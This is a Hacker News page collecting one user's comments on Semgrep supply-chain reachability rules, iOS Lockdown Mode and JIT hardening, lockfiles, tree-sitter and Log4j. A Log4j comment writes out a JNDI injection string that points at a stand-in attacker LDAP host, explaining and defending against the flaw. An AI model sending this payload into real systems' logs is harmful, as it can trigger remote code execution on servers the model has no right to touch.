Hacker Newsnew | past | comments | ask | show | jobs | submit | more ievans's commentslogin

Both Semgrep Supply Chain and govulncheck (AFAIK) are doing this work manually, for now. It would indeed be nice if the vulnerability reporting process had a way to provide metadata, but there's no real consensus on what format that data would take. We take advantage of the fact that Semgrep makes it much easier than other commercial tools (or even most linters) to write a rule quickly.

The good news is there's a natural statistical power distribution: most alerts come from few vulnerabilities in the most popular (and often large) libraries, so you get significant lift just by writing rules starting with libraries.


(Disclaimer: I work at Phylum, which has a very similar capability)

Not all of it has to be manual. Some vulnerabilities come with enough information to deduce vulnerability reachability with a high degree of confidence with some slightly clever automation.

Not all vulns come with this information, but as time goes on the percentage that do is increasing. I'm very optimistic that automation + a bit of human curation can drastically improve the S/N for open source library vulns.

A nice property of this is: you only have to solve it once per vuln. If you look at the total set of vulns (and temporarily ignore super old C stuff) it's not insurmountable at all.


In what format is that information coming in? There are no function taints in githubs OSV data or NVD's data that I can see.


> Both Semgrep Supply Chain and govulncheck (AFAIK) are doing this work manually, for now.

Ya I get that, but surely you don't have 100% coverage. What does your code do for the advisories which you don't have coverage for? Alert? Ignore?


Since security vulnerability alerts are already created and processed manually (e.g., every Dependabot alert is triggered by some Github employee who imported the right data into their system and clicked "send" on it), adding an extra step to create the right rules doesn't seem impossibly resource intensive. Certainly much more time is spent "manually" processing even easier-to-automate things in other parts of the economy, like payments reconciliation (https://keshikomisimulator.com/)


That's 100% coverage which is ideal but will take time to get to.


All the engine functionality is FOSS https://semgrep.dev/docs/experiments/r2c-internal-project-de... (code at https://github.com/returntocorp/semgrep); but the rules are currently private (may change in the future).

As with all other Semgrep scanning, the analysis is done locally and offline -- which is a major contrast to most other vendors. See #12 on our development philosophy for more details: https://semgrep.dev/docs/contributing/semgrep-philosophy/

Relevant part of the changelog is a good idea--others have also come out with statistical approaches based on upgrades others made (eg dependabot has a compatibility score which is based on "when we made PRs for this on other repos, what % of the time did tests pass vs fail")


Ah okay, thanks for the information.


We added support to the Semgrep engine for combining package metadata restrictions (from the CVE format) with code search patterns that indicate you're using the vulnerable library (we're writing those mostly manually, but Semgrep makes it pretty easy):

    - id: vulnerable-awscli-apr-2017
      pattern-either:
      - pattern: boto3.resource('s3', ...)
      - pattern: boto3.client('s3', ...)
      r2c-internal-project-depends-on:
        namespace: pypi
        package: awscli
        version: "<= 1.11.82"
      message: this version of awscli is subject to a directory traversal vulnerability in the s3 module
This is still experimental and internal (https://semgrep.dev/docs/experiments/r2c-internal-project-de...) but eventually we'd like to promote it and also maybe open up our CVE rules more as well!


Here is a good writeup of some of the pros and cons of using a "reachability" approach.

https://blog.sonatype.com/prioritizing-open-source-vulnerabi...

>Unfortunately, no technology currently exists that can tell you whether a method is definitively not called, and even if it is not called currently, it’s just one code change away from being called. This means that reachability should never be used as an excuse to completely ignore a vulnerability, but rather reachability of a vulnerability should be just one component of a more holistic approach to assessing risk that also takes into account the application context and severity of the vulnerability.


Err, "no technology currently exists" is wrong, "no technology can possibly exist" to say whether something if definitively called.

It's an undecidable problem in any of the top programming languages, and some of the sub problems (like aliasing) themselves are similarly statically undecidable in any meaningful programming language.

You can choose between over-approximation or under-approximation.


I saw that Java support was still in beta. But it makes me wonder if it's going to come with a "don't use reflection" disclaimer, then...?


Notable highlights for me:

> Lockdown Mode is available in iOS 16 and coming soon in iPadOS 16 and macOS Ventura.

> Web browsing - Certain complex web technologies are blocked, which might cause some websites to load more slowly or not operate correctly. In addition, web fonts might not be displayed, and images might be replaced with a missing image icon.

The first sentence I believe is referring to disabling JIT (just in time compilation of Javascript), which is dangerous as it allocates W+X pages which are often used by the final stage of an exploit. Apple did an amazing job already of hardening iOS by severely restricting which applications can use JIT (and this is their justification for why non-Safari browser engines are not allowed on iOS) and even enabling per-thread memory page permissions. Many more details are in this fantastic post from Google's project Zero: https://googleprojectzero.blogspot.com/2020/09/jitsploitatio...

Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users -- not that I'm complaining!


> Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users -- not that I'm complaining!

My theory on this is that apple is one of the few companies where everything they build seems to be well integrated into their ecosystem. This is part of their appeal.

Another part of Apple's appeal is that they've positioned themselves to appear as the company that cares the most about consumer privacy and security. Lockdown mode seems to be one of those features that's great for marketing and PR in certain circles, while being extremely useful in situations where it's needed.

I imagine someone writing an article claiming how lockdown mode saved them, and that's practically free viral marketing in the security circles.


> Lockdown mode seems to be one of those features that's great for marketing and PR in certain circles, while being extremely useful in situations where it's needed.

Also, it gives them additional room to play with security research and engineering at large. They already have an incentive to improve security on device (drive by attacks, jail breaking), and this just enables them to play with things that are safer but break too much. They’re basically training their other tech teams to be more secure, and find where security and UX clash, identify and build the fix, even if off by default.


Also, and of course totally coincidental, it gives them a great justification for blocking other browsers.


Completely coincidental, I am sure.

Absolutely no one vendor can match apple in security, ever.


You gotta admit, they do invest a ton of money into security. Mainly to keep consumers from running their own custom software on their devices. I guess that keeps out attackers too. But do keep in mind the user themself is probably part of Apple's threat model.


I don't care, as long as they make Lockdown Mode secure for my main app.

I'll get an Android phone if I want choices in situations where I don't need them.


Is there some angle for corporate phones too? If you’re a company and you’re going to buy a load of phones and you ask your cybersecurity department, I think they’d probably already tell you that iPhones are more secure. This just adds to it. Perhaps Apple are worried about eg pixel phones reliably getting security updates.


Same for Tesla's Bioweapon Defense Mode. Nearly nobody ever needs it but it gets them some low cost marketing / viral clicks.


> Bioweapon Defense Mode. Nearly nobody ever needs it

Raging wildfires causing smog all over the west coast beg to differ. Having built-in HEPA filtration is fantastic.


"Bioweapon defense mode" is a marketing ploy for "there's a HEPA cabin filter and a recirculation function", both of which a massive number of other cars on the market have both of as well.


You mean false advertising? Because unless is it an actual overpressure system, using compressed and probably stored air, that VX gas is getting in.

https://www.ncbi.nlm.nih.gov/pmc/articles/PMC7158270/ "In principle, homes could be outfitted with High-Efficiency Particle (HEPA) filters, although this would require substantial modifications to most home heating, ventilation, and air conditioning (HVAC) systems and would require positive overpressure systems to prevent infiltration through cracks. However, hermetically sealed office buildings frequently have HEPA filters and positive overpressure HVAC systems, making it easier to ‘harden’ such buildings if they are likely targets of attack or if they perform critical functions in the midst of an emergency."


To be fair, it's advertised as a "bioweapon defense mode" and not a "chemical weapon defense mode".


Different take… Apple is going to push the idea wider and this is their test audience.

It wouldn’t surprise me if the anti-googled, that is instead of enforcing adoption of a web technology because they own the browser market, stopping all the misused technologies they don’t want to have to explicitly protect for.


Exactly, this is a business move to stop competitive advertising while they sell their own.


> which is dangerous as it allocates W+X pages which are often used by the final stage of an exploit

Are you sure? There's no need to ever have a page that is W and X at the same time, and I would not expect any current professional JIT to make one.


Thanks for the correction; my knowledge is a bit out of date, Firefox at least (not sure about Safari) switched to W^X JIT a good while back: https://jandemooij.nl/blog/wx-jit-code-enabled-in-firefox/. That's cool.

W^X is more difficult to exploit for sure, but as other commenters point out, unfortunately still possible.


W^X is enforced for all processes on macOS on Apple Silicon.


Technically pages alternate between W and X as you say, but this will disable even that (which is already true AFAIK for non-Apple iOS apps, they can't have JITs).


They can’t have their own JIT. If you use SFSafariViewController or WKWebView you’re using Safari and it’s standard JIT. But you have no access to it outside normal JS so it’s no more exploitable than the Safari app would be.

I believe the JIT runs in its own process too.


There are still RWX pages in Chrome, something to do with WASM I think. I don’t know about Safari. Old MS Edge used to solve the remapping of the W JIT page to X by moving JITTing to another process and then having it RW in there, but only ever be RX in the primary process.


It doesn't have RWX pages on macOS; macOS on Apple Silicon (and under the Hardened Runtime on Intel, although I'm not sure whether or not Chrome's adopted that) strictly enforces W^X.

https://developer.apple.com/documentation/apple-silicon/port...


I just looked it up in the Armv8 manual and there is a control setting that makes the processor ignore the executable permissions for any writable pages. It states these controls ‘are intended to be used in systems with very high security requirements.’ which suggests there are drawbacks.

https://armv8-ref.codingbelief.com/en/chapter_d4/d44_1_memor...


The drawback is you have to rewrite some old code. I don't think there's anything else of note.

Maybe there are situations where switching permissions is too expensive in an unavoidable way but that borders on chip design problem...


My understanding is that trying to execute a page that's been written to is already insanely slow on essentially all modern processors, whether or not they care about security.


Makes sense, that would conflict with features like branch prediction.


Does the distinction matter? Is changing W pages into X pages meaningfully safer?


It depends on the kind of vulnerability. Say you have a vulnerability that allows writing to arbitrary pages, then an attacker on RWX system can write malicious code into pages that would get executed. In W^X environment, the attacker needs to find a W page and write to it before it becomes the X page.

This isn't a 100% mitigation, but it does make it harder to exploit.

JavaScript JIT been source of so many RCE vulnerabilities.


Yes. It means that you can’t use a write primitive to simply modify an already executable page.


How does that help?


It means an attacker with an arbitrary-write vuln needs to be able to target a page as the JITted code is being written to it, rather than being able to target any existing page with code in it.


And since javascript is so focused on a single thread, it's easy to make sure it's not even running at the same time your JIT code is doing those writes.


No, Apple uses mirror mappings or fast permission restrictions to flip the bits if available.


> Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users

Apple has been doing this for decades with heavy investment into assistive technology, far better than other platforms.


I was mucking about on my Mac the other day playing with the accessibility settings and came across this: https://support.apple.com/en-gb/guide/mac-help/mchlb2d4782b/... - s system that lets you move the mouse with movements of your head as picked up by the web cam. Woks very. Scrunch nose to click etc.


Looking at you Google. The only things they make is to spy more


ChromeOS is among the most secure "daily-driver" operating system and has been for years.


It's designed to make a computer secure against even physical access to the hardware. Because ChromeOS systems are often used as work or school machines, and need to be 100% completely owned by the institution and immune to the actual user.


Apple isn’t much better. They just have better marketing.


Marginally better privacy, waaaaaaay better marketing.

Which is funny because google is the advertising company.


Google has great advertising - they are just not marketing TO you like Apple is :-D


very good point!


I mean, to be fair, Google grew up just trying to get us to click on things. Apple had to convince people to part with sums of money for lumps of metal and plastic with lightning in them.

Apple probably had a bigger budget for that sort of thing from the beginning, thus creating a proper culture. Google, probably not so much.


>Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users -- not that I'm complaining!

Getting world leaders, celebrities and CEOs to use their devices might make this part of their marketing budget.


I think the primary user base will be human rights activists and journalists, similar to Google’s Advanced Protection Program.


I don't think human right activists and journalists are the most at risk here. They are more at risk than you and me but at least, they can keep a low profile.

CEOs and celebrities and politicians are not only at risk because of their influence and insider knowledge, but they also have a huge target painted on them at all times. They simply can't keep a low profile due to their occupation. They also have money, much more than journalists and activists, so they attract "regular" criminals too.

Human right activists and journalists probably won't be their main user base but it will be the most prominent for public relations reasons, because who doesn't like human right and investigative journalism? VIPs are less marketable and let's not talk about criminals. To keep things clear, I think it is a good feature, even if it can help criminals. After all, human right activists are often technically criminals where they act.


Many journalists whole job is to not keep a low profile and pull attention from the public. I'm not sure politicians get killed that much more in comparison [0]. Money is usually enough to solve political problems.

[0] https://www.euronews.com/green/2022/02/18/30-environmental-r...


> because who doesn't like human right and investigative journalism?

Everyone they're investigating. Here's a list of 51 journalists killed just this year https://cpj.org/data/killed/2022/?status=Killed&motiveConfir...


> targets human rights defenders, journalists, and dissidents

It’s literally spelled out as one of the target audiences in Apple’s press release announcing the feature.


I have yet to hear about NSO tools being used to target celebrities who are not activists. Activists are targeted all the time. For example, Mexico used its NSO install to target a person that was working to get a tax on sugar sweetened beverages passed. And their children!

https://deibert.citizenlab.ca/2017/02/mexico-nso-group-and-t...


Journalists in Mexico have an extremely high murder rate, friend. It's definitely a serious risk.


I suspect this is a direct response to the NSO Group related hacks.


Considering NSO Group is specifically mentioned by name multiple times in Apple’s press release announcing Lockdown Mode, I’d say you’re right…

> Lockdown Mode offers an extreme, optional level of security for the very few users who, because of who they are or what they do, may be personally targeted by some of the most sophisticated digital threats, such as those from NSO Group and other private companies developing state-sponsored mercenary spyware.


I hadn’t thought of that but it’s an excellent observation and would make perfect sense.

Outside of that it’s kind of left-field and out of character for them to give users a way to make things work worse.


> Apple did an amazing job already of hardening iOS by severely restricting which applications can use JIT (and this is their justification for why non-Safari browser engines are not allowed on iOS)

I think it's probably inaccurate to conflate these two things: the JIT was not even allowed in third party browsers when using Safari for a long time, and they still didn't allow other browser engines. If this was the only reason, surely other browser engines without JIT would be fine?


Any Turing-complete interpreter written in a non-memory-safe language is a potential exploit vector; and browsers are full of them. The major browser engines all do their own font rendering, for just one example.

This is why the iOS App Store allows Swift Playgrounds (app with a memory-safe interpreter), and allows iSH Shell (virtualized POSIX environment, where you can write and run e.g. bash scripts), but doesn't allow iSH Shell to ship with gcc.


> but doesn't allow iSH Shell to ship with gcc.

That's just a business requirement on the App Store rather than a technical requirement. Nothing prevents you from installing iSH shell and then installing gcc yourself afterwards. In fact I have done so.

To summarize, Apple made a speed bump, not a wall.


iSH doesn’t ship with GCC because it is massive, not because Apple blocks it. In fact it would probably be easier for us to include it rather than deal with making the package available to be reviewed.


fwiw swift playgrounds actually does have an entitlement [1] which lets in run self-signed code

[1] https://news.ycombinator.com/item?id=22632692


Chrome and Chromium has flags to disable JIT as well, but there is definitely a significant performance penalty.

One area of greatest concern for me is client hints and the various JS APIs that leak way too much, from OS to memory and more. You would think that an extension as popular as uBlock Origin would exist that would make this information as generic as possible to mimic the most common browser profile. Without it, it is still incredibly easy to identify a user with JS enabled and unfortunately disabling JS also makes you unique.

This doesn't even address the Canvas API issue that needs to be virtualized to protect privacy. The web standard as a whole hasn't really put a lot of thought into privacy.


> Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users

Maybe Apple wants to encourage more (non-classified) government use of iPhones? Maybe they have a big juicy contract they could take if they just get their OS into the right shape for it?

Government purchase-orders used to be the main thing that kept RIM/Blackberry afloat: they were a Canadian manufacturer, and so were (or could be validated + closely scrutinized to be) trustworthy as a supplier for American government communications systems. This is 90% of why the Blackberry ecosystem was... the way that it was.

Apple is now in (nearly) the same position. And their ecosystem has also been strange for the last 6-or-so years, in that particular "there's no clear reason for this, unless the government asked you to do it for supply-chain-integrity purposes" way (e.g. a self-serve repair program that requires you to pre-register a device for repair before ordering parts, and then report the part IDs to initiate online pairing.)


Apple owns this market. They really are BlackBerry.

The niche they don’t play in is some police, inspector, and other outdoor jobs. The iPhone environmental operating range is too narrow.


>Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users -- not that I'm complaining!

I would say that this is at the very least a strong marketing point. "We are secure by default, and the most secure phone out-of-the-box on the planet if needed".

The hardware itself must be trusted to an extent, too. Is there an android-compatible device/ROM combination that can advertise the same level of security as this lockdown mode, without spending two days configuring it?


Google has advanced protection [1] which also extends into Android [2]. Setup is easy and fast.

In no way is this 'revolutionary' by Apple.

[1] https://landing.google.com/advancedprotection/

[2] https://support.google.com/accounts/answer/9764949?hl=en


Pixel with one of the security-focused ROMs, maybe?


> without spending two days configuring it?

TBH, if you have a target on your back, spending two days configuring your phone is a pretty small inconvenience.

On the other hand, if you're applying this without looking deeper into what it covers, what it doesn't, and the linits you'll probably be in trouble sooner than later.


Part of the problem is difficulty, no? If it takes you two days to configure the phone to be safe, how sure are you that you’ve got every single option you had to change completely correct? That seems like a lot of possible mistakes.

“Slide this and cover practically everything built in” is a lot more reliable. You can still have problems (as always) with anything extra you install, like any system would.


I hear you, and think Apple’s default are useful, but under a set of conditions:

- you spent the time to know what they do, and how they work

- you set yourself at the right level of security

So you still need to be sure that Apple got every single option completely right for your use case in the configuration you chose.

That’s probably a one time task, and once you understand what it does and where it protects you, you can just move the slider. But it can’t be a “no-brainer” just slide the thing.

I’d compare this to buying an insurance: some will have 3 plans and you just choose one level, some have 250 options and you take hours or days going though each of them.

But whichever you choose you’ll still spend a significant amount of time going though all the papers to even understand what the terms are and what you’re actually paying for. You wouldn’t be paying years of insurance to realize at the worst time that the “just sign this” plan was partly incompatible with you health situation.


Appreciate your concern is genuine, but I think most of the people benefit from this lockdown mode are people who are mostly technically illiterate, and at the same time they are also cash strapped, unless they are the journalists from well funded media company.

What these people needed from the tech community is a fool proof failed safe way to turn the security level to the max.

What Apple just did is going in this direction. I am hope Google can do the same.


Just wanted to say thank you for making this point. Far too many people on this site (and in tech in general) fall into this category: https://xkcd.com/2501/

People being targeted by the NSO Group are generally very smart very educated people, but they're journalists, not digital security specialists. They may even know how to beat a tail, but they have no idea about MAC addresses. As someone who has been on both sides of the divide just "flipping a switch" is a massive upgrade to the ability for reporters and activists to keep themselves and their contacts safe.


My bet is that long-term, apple will build manufacturing in the US and Europe explicitly, and target government contracts for phones for officials.

A phone fully designed, developed, and assembled in the States with capacity to further lock down is a huge + for three letter agencies.


It's more or less impossible to do this. American workers on the Mac Pro line can't even screw in screws correctly.



Yes. GrapheneOS on a Pixel device.

https://grapheneos.org/


Remember when Tim Cook said he didn't care about the ROI when Apple spent millions making their devices more accessible?

Lockdown mode is quite similar in that thinking.

https://www.macobserver.com/tmo/article/tim-cook-soundly-rej...


During Apple’s annual meeting an activist asked Tim Cook to commit to doing only those things that are profitable. To which he responded: “When we work on making our devices accessible by the blind, I don’t consider the bloody ROI.”


>commit to doing only those things that are profitable

People that think like this are a danger to humanity.


It reads like a US Government RFP response to me.

Perhaps requested by Biden's Director of InfoSec?


> Apple did an amazing job already of hardening iOS by severely restricting which applications can use JIT

Well they did that not because they care about users but because they want all software to pass trough the App Store (and thus the review and policies of Apple). If you would allow to run efficiently code from other sources (for example downloaded at runtime, put in a W+X memory page and executed) that code doesn't pass through the review process of Apple, thus one can publish an app that does something and then modify its code to make it do another thing (even load an entirely different thing).

In the end I don't think this is a good thing for users.


Indeed this, it's more about platform control.

I really hope the EU will succeed in forcing Apple to allow third party app stores. That would be a game changer. People that are happy to stay in the walled garden can simply not use any other app stores but for someone like me it will open up iOS as an actual option I can choose. Right now there's too many things I can't do on iOS.

Though honestly, I'd be even happier with a real third option instead.


What do you need iOS to do?


I’d like to write an app for myself, side load it, and Apple not have to give me special permission to do what I want. Right now, I have to have a “shortcut” start my own app (for simming) to change some device settings, then remember to change them back after the session. But if Apple would allow you to do whatever you want without their permission (on your own device), my life would be a bit simpler.


This is great news! I like how the article cites evidence that MFA is disproportionately effective against account takeover.

If the rubygems devs are looking for other highly effective wins against supply chain attacks: I think the next thing is deeper support for lockfiles. Although Ruby has Gemfile.lock, it's not a true lockfile in the same way that package managers in the javascript/go/python ecosystems are. Specifically, locking versions is optional, there's no locking by hash (Github issue: https://github.com/rubygems/rubygems/issues/3379), and there's no capability to lock local or source-only dependencies by hash. By comparison: go modules, pipenv, npm, yarn, nuget, composer, and gradle already support locking by hash.


you can add cargo to that list as well.


This is a great article and I think tree-sitter's design choices are creating a budding ecosystem of new program analysis tooling. This article discusses the speed advantages, but I think the fact that tree-sitter is dependency-free (which the author's previous article did mention) is worth highlighting again.

For context, some of my teammates maintain the OCaml tree-sitter bindings and often contribute to grammars as part of our work on Semgrep (Semgrep uses tree-sitter for searching code and parsing queries that are code snippets themselves into AST matchers).

Often when writing a linter, you need to bring along the runtime of the language you're targeting. E.g., in python if you're writing a parser using the builtin `ast` module, you need to match the language version & features. So you can't parse Python 3 code with Pylint running on Python 2.7, for instance. This ends up being more obnoxious than you'd think at first, especially if you're targeting multiple languages.

Before tree-sitter, using a language's built-in AST tooling was often the best approach because it is guaranteed to keep up with the latest syntax. IMO the genius of tree-sitter is that it's made it way easier than with traditional grammars to keep the language parsers updated.

Highly recommend Max Brunsfield's strange loop talk if you want to learn more about the design choices behind tree-sitter: https://www.thestrangeloop.com/2018/tree-sitter---a-new-pars...


Many folks have often (correctly!) pointed out that each language's existing parsing packages will be more guaranteed to keep up with language changes. Our hope is that if we can get a critical mass of useful tools that all use tree-sitter under the covers, there will _also_ be incentives to ensure that the tree-sitter parser for each language stays up-to-date. And because of how tree-sitter grammars typically live in dedicated repos, that work might be done by external volunteers, and not by the core language developers.

Another benefit to our approach is that it should be much easier to adapt OP's linter to work with other languages, since in a sense it's “parameterized” by the language grammar and queries. If you use Python's `ast` module, you can't easily adapt that code to work on Go programs, for instance.


Hadolint is great! If you want to customize your lint logic beyond the checks in it, I recently wrote a Semgrep rule to require all our Dockerfiles to pin images with a sha256 hash that could be a good starting point: https://github.com/returntocorp/semgrep-rules/pull/1861/file...


Author here. The idea for this post came about after a HN reply (https://news.ycombinator.com/item?id=28965469) to one of my comments about the ua-parser-js issue. And the most recent trigger was a conversation with some Ruby developers about whether or not Gemfile.lock provided any security benefits (as you can see from the chart, bundler is an outlier compared to pip/npm/yarn). I wanted to collect the arguments for and against lockfiles and examine how widely supported the most critical features; would love feedback on the arguments as well as whether I’ve gotten the details write on which package manager supports what.


If you are logging a user-controlled string, the user can provide a string that uses the JNDI URL schema like ${jndi:ldap://attackercontrolled.evil}. This will fetch deserialize an arbitrary Java object, which can cause arbitrary code execution (ACE). Here's an explanation of how deserializing leads to ACE: https://vickieli.dev/insecure%20deserialization/java-deseria...

Another commentators states that after Java 8u191 arbitrary code execution isn't possible but you can get pingback: https://news.ycombinator.com/item?id=29505027


Thank you for the explanation.

Mitigation seems to disable JNDI lookups. Wouldn’t it make more sense to disable parsing altogether? In what possible situation does anyone want their logging library to run eval(…) on arbitrary inputs?!


If you'd like to detect whether you're affected by this dynamically, it looks like https://github.com/google/tsunami-security-scanner-plugins/i... will eventually make it into Google's dynamic scanner: https://github.com/google/tsunami-security-scanner (I bet it would be easy to write a plugin for https://github.com/projectdiscovery/nuclei as well.)

To see if there are injection points statically, I work on a tool (https://github.com/returntocorp/semgrep) that someone else already wrote a check with: https://twitter.com/lapt0r/status/1469096944047779845 or look for the mitigation with `semgrep -e '$LOGGER.formatMsgNoLookups(true)' --lang java`. For the mitigation, the string should be unique enough that just ripgrep works well too.


The Activescan++ extension for burp has been updated, but you need to do a manual update to get it:

https://github.com/PortSwigger/active-scan-plus-plus/commit/...


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: